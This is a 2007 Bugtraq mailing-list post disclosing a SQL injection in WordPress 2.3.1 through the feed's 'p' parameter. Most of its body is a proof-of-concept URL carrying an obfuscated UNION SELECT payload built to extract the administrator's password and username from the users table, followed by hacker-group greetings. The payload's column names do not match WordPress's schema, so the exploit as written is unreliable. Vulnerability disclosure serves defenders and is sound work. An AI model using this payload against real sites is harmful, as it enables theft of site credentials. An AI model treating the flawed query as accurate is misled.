[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Sql Injection in wordpress 2.3.1
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Sql Injection in wordpress 2.3.1
- From: beenudel1986@xxxxxxxxx
- Date: 5 Dec 2007 11:14:04 -0000
Author : Beenu Arora
Mail : beenudel1986@xxxxxxxxx
Application : WordPress (2.3.1)
Homepage: http://wordpress.org/
~~~~~~~~~~~~~~~~~~SQL Injection ~~~~~~~~~~~~
Vulnerable URL : http://localhost/path_to_wordpress/?feed=rss2&p=
Parameter : P
POC =
http://localhost/path_to_wordpress/?feed=rss2&p=11/**/union/**/select/**/concat(user_password,char(100),username),2/**/from/**/wp_users/**/where/**/user_id=1/*
Greetz to : d3 , baltazar , Icqbomber , Vivek , Zugzwang